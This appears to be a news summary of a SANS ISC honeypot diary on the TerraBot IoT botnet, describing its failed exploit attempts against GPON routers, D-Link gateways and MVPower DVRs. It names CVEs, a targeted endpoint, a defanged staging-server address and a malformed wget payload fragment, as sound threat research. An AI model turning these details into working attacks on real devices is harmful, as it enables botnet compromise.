TerraBot IoT Botnet Analysis Reveals Automation Failures and Persistent Scanning
A SANS ISC guest diary dissects the TerraBot IoT botnet, revealing how automated cybercrime campaigns succeed through volume despite technical flaws.
A SANS Internet Storm Center guest diary by Nicole Phillips, an ISC intern in the SANS.edu BACS program, provides a detailed analysis of automated cybercrime noise observed through a DShield honeypot. The report focuses on the TerraBot IoT botnet, a variant derived from Mirai and Gafgyt source code, which scans the internet for vulnerable IoT devices to build a network of compromised systems. Between May 28 and June 9, the honeypot recorded 24 hits from 24 unique IPs using the User-Agent string 'terrabot-owned-you', with the majority targeting specific endpoints.
The analysis reveals that 17 of the 24 hits targeted the /GponForm/diag_Form?images/ endpoint, while 6 hits delivered a payload exploiting CVE-2016-20017, an unauthenticated command injection vulnerability affecting legacy D-Link DSL gateway routers. The payload attempted to use a staging server at hxxp://140[.]233.190.47. However, the diary highlights significant automation failures in TerraBot's operations. The first hit in the logs was a POST request to /GponForm/diag_Form?images/ attempting to exploit CVE-2018-10561, an authentication bypass flaw in Dasan GPON routers, but the request body was empty, rendering the exploit ineffective.
Further analysis of a June 9 event targeting CVE-2016-20016, a well-known unauthenticated remote code execution backdoor in legacy MVPower CCTV DVRs, revealed a formatting bug. The script author inserted an unencoded raw space character after 'wget+' instead of standard URL encoding, causing the web server to reject the request. This technical limitation prevented the botnet from successfully compromising the targeted devices.
Despite these failures, the diary emphasizes that automated botnets like TerraBot succeed through volume and mass scanning. The operators exploit the fact that network defense is often reactive, and they can find and weaponize simple gaps that go unnoticed. The analysis underscores the importance of understanding automated cybercrime noise to recognize anomalies and improve threat detection.
The TerraBot botnet's activity is part of a broader ecosystem of automated cybercrime, where attackers use disposable swarms of compromised devices to conduct mass scanning and exploitation campaigns. The diary concludes that while these operators exhibit technical limitations, their persistence and volume make them a significant threat to internet-facing infrastructure.